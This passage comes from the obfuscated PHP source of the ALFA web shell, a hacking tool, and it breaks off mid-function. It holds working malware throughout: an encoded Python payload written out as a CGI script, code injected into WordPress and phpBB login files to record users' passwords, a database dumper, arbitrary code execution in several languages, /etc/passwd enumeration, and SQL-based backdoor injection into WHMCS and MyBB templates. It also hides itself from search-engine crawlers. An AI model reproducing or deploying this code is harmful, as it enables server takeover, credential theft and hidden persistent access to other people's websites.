FSM7kiI1XSlF8yRkrFLYXEWfIgYFHJOdgig6urHSzc/HUq70sRIpbwR6WVLhr7FKwSTThleZFGog3jCxFpaNcTWEGqzD33Fkx2prU2FvkVVPo16439EIJoDFfvvfYf++3/ddv/ujYt/bHeKSJZMF8/obtQLC22KPftQQyaR3kbDR6QnN3m1jJfhdhQtlt2iJDRcAl6jYY5z0M2OkDBZHZH9k+O9smE7Z+SNjl4dUzOWRoOLYk0FHk0erKGCTSEEiwTabOzTYv1HPyYD0jKF8vcjj+xFAA3A+l224/DOB3s9Pfm827XvuFBvhz0nnWTW7tMTCiLyLc9g6Hto43Kt7dMCAtDnmQ8s2+WPGdt2BI+WBjFN6mX2BuR7+sVlB0etYX8AZRR4A30OYdxsO2FfBENyAqUCZk9i1MICuAktySLQx4QKHX2DLy6SHGmAd9hBYQNDt4E7Nt2tvQC1KMLv8+Aaqc7/qn7bF9xaqdewItsgEvKNtLfQwV+xAy/SDPwEUlijgn4FcdIY4nc6+u6zmiDikHI5nmpSE94YiO2wpXYCnKPXa+VwFJenZcI7sNukpEkcYoF4yEHbHb8VbD+W9xK3/2CKj8QzwekJV4Q8GjRVk7KcqjKA7L35QpDTRC+waBAaD3YyliTlH6NvK5pX1O+FFzTpW7PzpH4KQUPej8Dmkr8vef+3t7zMvG73cfVDvGKPLY3WL5xgw0tuTVnOP3GEdamb1VlcDXW4zkgZAb2qNlCSHToTlf8QGGNE+lKh8IXpkbtU74KtWrfS4ZOFwB0FjCTpkGVrJouVBMlCgJJR1dkOKtKCXiEkcwLSAvS9xPPOHRh8qcAq68XixU0/I4fr4bWbESusf5GeVV/hzl2biLd7NAeDBJSS/QeJT7sJdw/4GihJ34rxzu0D4rmyCJoECmt57DrHPqOpYEXeWVfQhJQo2HXTr8/7vefi5XLSnNysOCqNs5GSm0CtTeC8yxYn8cEmz5LIcA4BHV0iZcH+MDG0mwRR3EM9pZTkNJ7RDutB8YfY9uHOrTiCA/0FfzFrMEUwhpPa3LUDcIJJPgxFgLktdbOUxh28ERXnb9rPWlExBEc4irmEjlH6Cqfuz/9Ai61ddBze9WAKolh5cX3KGrOodWA8yVNfzZnvT2gqalV4l+7GqF2NQ2iM2Y/PA3KleW9Jej8jVWYlhxXX8JOWzdmSFeHSKu7no7u6hux6v/QhOlXE+Y/nU+3o9aPjKJ/a7ICgEweSO46A6wWJbkvp0yoUNvZr/sXZzJfpus97HI2bM6NimQ0oo3ZWD6/S7+USkZiBg65/9GhEHw/juYcdpur76eM3MUFnFvg5VdIAJUBQCQSQk6ARA2Fcw8+7K1Or2M4p1WDJWToPxoqm9eAa+D0SG5cc+2FHqjbNatJUKASduszhiV55d3yVbEiORCTGM6IX7lTzBjYHhiZWZ7BxrfML3JWMlxvWtsrOPteOm1vuC4PLo7PJ9Oz/dMxHDNru73CGF+8G19sMZqna1Jex9iaTN0ShIdW7aKISmUcEjDcFtOZuJyVp2kfr8C0xqD9AFaAWPJSoIH6QV1ufsCTdGMN40XFwbyhAl4TvHezJ37gZk/xxgkvz2CwgBOivO75LoF9n0LGv3lFqi5oOzWovdHehMEDR4nKPdQPiFuv6S6F6qtY4aKSWwGV+V9xjWT8wbQ3rXsnHLy/wXvfv9RRth3DfVFPjhqmLO73WuIw4J/KBqGGQ5xmBn0cx/SRGD+k5YOHuomaMUUDqgKybUCySYOI0TD5tqjGYFoKL4dKksY3maP3uzrJEphJ/CWDoqKLygCiRTqorMaMUqdPc92qLqvKBPiLcawbU0+Pen3QLo9frfX9k4tTcQ3qtprb35b14ytFQd0of/EfDcD2s9Or8g3v6chnaouLKwWUmLvbemPi0SdkxrCxPgJWU3XgxRvQ1I1MvE1VCaBN8QC7AWndRnGsMlJo+GU13GzKFLLK+JQxtpLaSEbt1lfHJLt1b1Kz/w8wblS+FRoAAA==")));"; $py = "#!/usr/bin/python" . "
import zlib, base64
" . "eval(compile(zlib.decompress(base64.b64decode("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")),'<string>','exec'))"; if ($_POST["alfa1"] == "perl") { $code = $perl; } else { $code = $py; } if (__write_file($name, $code)) { @chmod($name, 493); echo "<iframe src="" . __ALFA_DATA_FOLDER__ . "/cgialfa/" . $name . "" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>"; } } echo $div; alfafooter(); } goto JSX0M; xbej7: define("ALFA_TEMPDIR", function_exists("sys_get_temp_dir") ? @is_writable(str_replace("\", "/", sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable(".") ? "." : false) : false); goto U9EXo; L1kU5: function hijackwp($path, $saveto) { $code = "$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST['log']." : ".$_POST['pwd']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);"; $redirect_wp = "#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#"; $code = str_replace("{saveto_path}", $saveto, $code); $login = $path . "/wp-login.php"; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (@preg_match($redirect_wp, $data_login, $match)) { $evil_login = "	" . $match[0] . "
\x9" . $code; $login_replace = @preg_replace($redirect_wp, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto Enl9a; uDqvN: function alfalogout() { @setcookie("AlfaUser", null, 2012); @setcookie("AlfaPass", null, 2012); unset($_COOKIE["AlfaUser"], $_COOKIE["AlfaPass"]); echo "ok"; } goto fabm5; KdxiI: if (isset($_POST["ajax"])) { function AlfaNum() { $args = func_get_args(); $alfax = array(); $find = array(); for ($i = 1; $i <= 10; $i++) { $alfax[] = $i; } foreach ($args as $arg) { $find[] = $arg; } echo "<script>"; foreach ($alfax as $alfa) { if (in_array($alfa, $find)) { continue; } echo "alfa" . $alfa . "_="; } echo """</script>"; } } goto e_ypN; j0eD9: function alfaDumper() { alfahead(); echo "<div class="header">"; AlfaNum(8, 9, 10); echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>" . getConfigHtml("all") . "<form method='post' onsubmit="g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;"><p>"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "db_host : ", "inputName" => "db_host", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "db_username : ", "inputName" => "db_username", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "db_password : ", "inputName" => "db_password", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "db_name : ", "inputName" => "db_name", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Dump Path: ", "inputName" => "dfile", "inputValue" => htmlspecialchars($GLOBALS["cwd"]) . "alfa.sql", "inputSize" => "50")); create_table($table); echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>"; $username = $_POST["alfa3"]; $password = $_POST["alfa4"]; $dbname = $_POST["alfa5"]; $dfile = $_POST["alfa6"]; $host = $_POST["alfa7"]; if (!empty($dbname)) { echo __pre(); $msg = "<center>Check this :  <font color='red'>" . $dfile . "</font></center>"; if (@mysqli_connect($host, $username, $password, $dbname)) { if (strlen(alfaEx("mysqldump")) > 0) { alfaEx("mysqldump --single-transaction --host="{$host}" --user="{$username}" --password="{$password}" {$dbname} > '" . addslashes($dfile) . "'"); echo $msg; } else { __alert("Error...!"); } } else { echo "<center>mysqli_connect : Error!</center>"; } } echo "</div>"; alfafooter(); } goto LJenm; CrZw0: @ini_set("max_execution_time", 0); goto DvZ1R; GzEVq: function alfaFilesMan2() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4); echo "<div style="position:relative;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"><div class="header"></div></div>"; alfaFooter(); } goto eiihp; fWEJX: function alfabasedir() { alfahead(); echo "<div class=header>\xa<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>"; $passwd = _alfa_file("/etc/passwd"); if (is_array($passwd)) { $users = array(); $makepwd = alfaMakePwd(); $basedir = @ini_get("open_basedir"); $safe_mode = @ini_get("safe_mode"); if (_alfa_can_runCommand(true, false) && ($basedir || $safe_mode)) { $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP"; $tmp_path = alfaWriteTocgiapi("basedir.alfa", $bash); $bash_users = alfaEx("cd " . $tmp_path . "/alfacgiapi;sh basedir.alfa " . $makepwd, false, true, true); $users = json_decode($bash_users, true); $x = count($users); if ($x >= 2) { array_pop($users); --$x; } } if (!$basedir && !$safe_mode) { $x = 0; foreach ($passwd as $str) { $pos = strpos($str, ":"); $username = substr($str, 0, $pos); $dirz = str_replace("{user}", $username, $makepwd); if ($username != '') { if (@is_readable($dirz)) { array_push($users, $username); $x++; } } } } echo "<br><br>"; echo "<b><font color="#00A220">[+] Founded " . sizeof($passwd) . " entrys in /etc/passwd\xa" . "<br /></font></b>"; echo "<b><font color="#FFFFFF">[+] Founded " . $x . " readable " . str_replace("{user}", "*", $makepwd) . " directories\xa" . "<br /></font></b>"; echo "<b><font color="#FF0000">[~] Searching for passwords in config files...\xa
" . "<br /><br /><br /></font></b>"; foreach ($users as $user) { if (empty($user)) { continue; } $path = str_replace("{user}", $user, $makepwd); echo "<form method=post onsubmit='g("FilesMan",this.c.value,"");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>{$user}</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='{$path}'><input type=submit value='>>'></form><br>"; } } else { echo "<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>"; } echo "<br><br></b>"; echo "</div>"; alfafooter(); } goto kcHRT; Wo4n0: function create_table($data) { echo "<table border="1">"; foreach ($data as $key => $val) { $array = array(); foreach ($val as $k => $v) { $array[$k] = $v; } echo "<tr><td><div class='tbltxt'>" . $array["tdName"] . "</div></td><td><input type='text' id='" . $array["id"] . "' name='" . $array["inputName"] . "' " . ($array["placeholder"] ? "placeholder" : "value") . "='" . $array["inputValue"] . "' size='" . $array["inputSize"] . "' " . ($array["disabled"] ? "disabled" : '') . "></td></tr>"; } echo "</table>"; } goto asGME; hId6W: function alfaphpeval() { if (isset($_COOKIE["eval_tmpdir"]) && @is_dir($_COOKIE["eval_tmpdir"])) { $tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]); } else { $tempdir = dirname(alfaEx("mktemp")); __alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir)); } alfahead(); if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "ini") { echo "<div class=header>"; ob_start(); $INI = ini_get_all(); print "<table border=0><tr>" . "<td class="listing"><font class="highlight_txt">Param</td>" . "<td class="listing"><font class="highlight_txt">Global value</td>" . "<td class="listing"><font class="highlight_txt">Local Value</td>" . "<td class="listing"><font class="highlight_txt">Access</td></tr>"; foreach ($INI as $param => $values) { print "
" . "<tr>" . "<td class="listing"><b>" . $param . "</td>" . "<td class="listing">" . $values["global_value"] . " </td>" . "<td class="listing">" . $values["local_value"] . " </td>" . "<td class="listing">" . $values["access"] . " </td></tr>"; } $tmp = ob_get_clean(); $tmp = preg_replace("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", '', $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; } if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "info") { echo "<div class=header><style>.p {color:#000;}</style>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", '', $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; } if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "exten") { echo "<div class=header>"; ob_start(); $EXT = get_loaded_extensions(); echo "<table border=0><tr><td class="listing">" . implode("</td></tr>" . "
" . "<tr><td class="listing">", $EXT) . "</td></tr></table>" . count($EXT) . " extensions loaded"; echo "</div><br>"; } $lang_html = ''; foreach (array("php" => "php ~> [ Windows / Linux ]", "perl" => "perl ~> [ Linux ]", "python" => "python ~> [ Linux ]", "bash" => "bash ~> [ Linux ]") as $key => $val) { $lang_html .= "<option value="" . $key . "" " . ($_POST["alfa3"] == $key ? "selected" : '') . ">" . $val . "</option>"; } echo "<div class=header><Center><a href=javascript:void(0) onclick="g('phpeval',null,'','ini')">| INI_INFO | </a><a href=javascript:void(0) onclick="g('phpeval',null,'','info')"> | phpinfo |</a><a href=javascript:void(0) onclick="g('phpeval',null,'','exten')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g('phpeval',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">" . $lang_html . "</select>" . _alfa_load_ace_options("eval") . "<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">" . (!empty($_POST["alfa1"]) ? htmlspecialchars($_POST["alfa1"]) : "&lt;?php
\xa	echo('hello alfa !');

?>") . "</div></div><center><input type="submit" value="" style="margin-top:5px"></center>"; echo "</form><pre id="PhpOutput" style="" . (empty($_POST["alfa1"]) ? "display:none;" : '') . "margin-top:5px;" class="ml1">"; if (!empty($_POST["alfa1"])) { if ($_POST["alfa3"] == "php") { ob_start(); eval("?>" . $_POST["alfa1"]); $result = htmlspecialchars(ob_get_clean()); } elseif (_alfa_can_runCommand() && $GLOBALS["sys"] == "unix") { $lang = $_POST["alfa3"]; $filename = "temp" . rand(11111, 99999); $temp = $tempdir . "/" . $filename; __write_file($filename, $_POST["alfa1"]); $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}"); @unlink($filename); @unlink($temp); } echo "<textarea class="bigarea">" . $result . "</textarea>"; } echo "</pre></div>"; alfafooter(); } goto GzP8G; qyg4S: define("__ALFA_VERSION__", "4.1"); goto w9Wdo; tOoun: function hijackPHPBB($path, $saveto) { $code = "$Alfa_u = request_var('username', '');$Alfa_p = request_var('password', '');if($Alfa_u != '' AND $Alfa_p != ''){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response['status'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response['user_row']['user_email']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}"; $find = "case 'login':"; $code = str_replace("{saveto_path}", $saveto, $code); $login = $path . "/ucp.php"; $evil_login = "\x9" . $find . "
\x9" . $code; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto wK3Iv; HZNvy: function _alfa_is_dir($dir, $mode = "-d") { $check = false; $check = @is_dir($dir); if ($mode == "-e") { $check = @is_file($dir); } if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("[ "" . trim($mode) . "" "" . trim(addslashes($dir)) . "" ] && echo "yes" || echo "no""); if ($check == "yes") { return true; } else { return false; } } } return $check; } goto DpoiO; yJd4z: if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spider"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } goto KS5YC; Qm0Jb: if (isset($_POST["c"])) { if (!@chdir($_POST["c"])) { $GLOBALS["glob_chdir_false"] = true; } } goto EZmej; Hq5LP: function alfaShellInjectors() { alfahead(); echo "<div class=header>"; AlfaNum(11); echo "<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g('ShellInjectors',null,'whmcs',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g('ShellInjectors',null,null,'mybb')">| MyBB | </a><a href=javascript:void(0) onclick="g('ShellInjectors',null,null,null,'vb')">| vBulletin |</a></h3></center>"; $selector = "<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>"; if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "whmcs") { AlfaNum(); echo __pre() . "<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>" . getConfigHtml("whmcs") . "</p><form onSubmit="g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;" method='post'>"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Path WHMCS Url : ", "inputName" => "path", "inputValue" => "http://site.com/whmcs", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Mysql Host : ", "inputName" => "dbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db Name : ", "inputName" => "dbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db User : ", "inputName" => "dbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Db Pass : ", "inputName" => "dbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50")); create_table($table); echo $selector; echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>"; if (isset($_POST["alfa6"])) { $dbu = $_POST["alfa6"]; $dbn = $_POST["alfa7"]; $dbp = $_POST["alfa8"]; $dbh = $_POST["alfa9"]; $path = $_POST["alfa10"]; $method = $_POST["alfa4"]; $index = "{php}" . ALFA_UPLOADER . ";{/php}"; $newin = str_replace("'", "\'", $index); $newindex = "<p>Dear {$newin},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href="{$pw_reset_url}">{$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{$signature}</p>{php}if($_COOKIE["sec"] == "123"){eval(base64_decode($_COOKIE["sec2"])); die("!");}{\/php}"; if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { if (filter_var($path, FILTER_VALIDATE_URL)) { $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_connect_error()); $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet["message"]; $tempSave = str_replace("'", "\'", $tempSave1); mysqli_query($conn, "UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die(mysqli_error($conn)); $inject = "UPDATE tblemailtemplates SET message='{$newindex}' WHERE name='Password Reset Validation'"; $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $create = "insert into tblclients (email) values('[email protected]')"; $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn)); if (function_exists("curl_version") && $method == "auto") { $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path . "/pwreset.php"); $getToken = preg_match("/name="token" value="(.*?)"/i", $saveurl, $token); $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&[email protected]"); $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn)); __alert("shell injectet..."); $ff = "http://" . $path . "/solevisible.php"; output($ff); } else { echo "<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br><center><b><font color="#FFFFFF">Please go to Target => </font><a href='" . $path . "/pwreset.php' target='_blank'>" . $path . "/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>[email protected]</font><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $path . "/solevisible.php' target='_blank'>" . $path . "/solevisible.php</a></b></center><br><br>"; } } else { __alert("Path is not Valid..."); } } } } if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "mybb") { AlfaNum(1, 2, 3, 5); echo __pre() . "<p><div class='txtfont_header'>| MyBB |</div></p><center><center>" . getConfigHtml("mybb") . "<form id='sendajax' onSubmit="g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;" method=POST>
"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Host : ", "inputName" => "dbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "DataBase Name : ", "inputName" => "dbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "User Name : ", "inputName" => "dbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Password : ", "inputName" => "dbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix : ", "inputName" => "prefix", "id" => "db_prefix", "inputValue" => "mybb_", "inputSize" => "50")); create_table($table); echo $selector; echo "<p><input type=submit value=' '></p></form></center></center>"; if (isset($_POST["alfa6"])) { $dbu = $_POST["alfa6"]; $dbn = $_POST["alfa7"]; $dbp = $_POST["alfa8"]; $dbh = $_POST["alfa9"]; $prefix = $_POST["alfa10"]; $method = $_POST["alfa4"]; $shellCode = "{${" . ALFA_UPLOADER . "}}"; $newinshell = str_replace("'", "\'", $shellCode); if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) { $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); $inject = "select template from {$prefix}templates where  title= 'calendar'"; $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $GetTemp = mysqli_fetch_assoc($result); $saveDate = $GetTemp["template"]; $repsave = str_replace($shellCode, '', $saveDate); $repsave = str_replace("'", "\'", $repsave); $createShell = "update {$prefix}templates SET template= '" . $newinshell . $repsave . "' where title = 'calendar'"; $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn)); $geturl = "select value from {$prefix}settings where name= 'bburl'"; $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn)); $rowb = mysqli_fetch_assoc($findurl); $furl = $rowb["value"]; $realurl = parse_url($furl, PHP_URL_HOST); $realpath = parse_url($furl, PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded("sockets") && function_exists("fsockopen") && $method == "auto") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { @fputs($fsock, "GET {$realpath}/calendar.php HTTP/1.1
\xa"); @fputs($fsock, "HOST: {$realurl}
\xa"); @fputs($fsock, "Connection: close
\xa\xd
